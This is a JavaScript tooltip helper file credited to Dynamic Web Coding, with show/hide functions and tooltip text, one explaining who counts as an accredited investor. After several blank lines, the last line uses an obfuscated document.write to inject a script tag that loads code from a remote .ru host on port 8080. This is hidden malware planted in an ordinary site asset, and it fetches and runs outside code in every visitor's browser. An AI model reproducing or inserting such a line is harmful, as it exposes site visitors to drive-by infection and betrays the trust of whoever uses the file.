/*************************************************************************
  This code is from Dynamic Web Coding at http://www.dyn-web.com/
  Copyright 2003 by Sharon Paine 
  See Terms of Use at http://www.dyn-web.com/bus/terms.html
  regarding conditions under which you may use this code.
  This notice must be retained in the code as is!
*************************************************************************/

// NOTE: The functions called onmouseover/out plus the message variables need to be included early in the document 
// or errors will be triggered if user hovers over tooltip-activating links before page completely loaded
function doTooltip(e, msg) {
  if ( typeof Tooltip == "undefined" || !Tooltip.ready ) return;
  Tooltip.clearTimer();
  Tooltip.show(e, msg);
}

function hideTip() {
  if ( typeof Tooltip == "undefined" || !Tooltip.ready ) return;
  Tooltip.timerId = setTimeout("Tooltip.hide()", 300);
}

// tooltip content variables
var msgTips = 'See the complete list of <a href="http://www.dyn-web.com/dhtml/tooltips/">tooltips</a> currently available at <a href="http://www.dyn-web.com/">www.dyn-web.com</a>, along with a brief description.';
var msgList = '<strong><i>Accredited investor</i></strong></a> means any person who belongs to one or more of the following  categories, or who the issuer reasonably believes comes within any of the following categories, at the time of the sale of the securities to that person:<ol><li>Any natural person whose individual net worth, or joint net worth with that person\'s spouse, at the time of his purchase exceeds $1,000,000;</li><li>Any natural person who had an individual income in excess of $200,000 in each of the two most recent years or joint income with that person\'s spouse in excess of $300,000 in each of those years and has a reasonable expectation of reaching the same income level in the current year;</li><li>Any trust, with total assets in excess of $5,000,000, not formed for the specific purpose of acquiring the securities offered, whose purchase is directed by a sophisticated person as described in Rule 506(b)(2)(ii); and</li><li>Any entity in which all of the equity owners are accredited investors.</li></ol>';





document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>');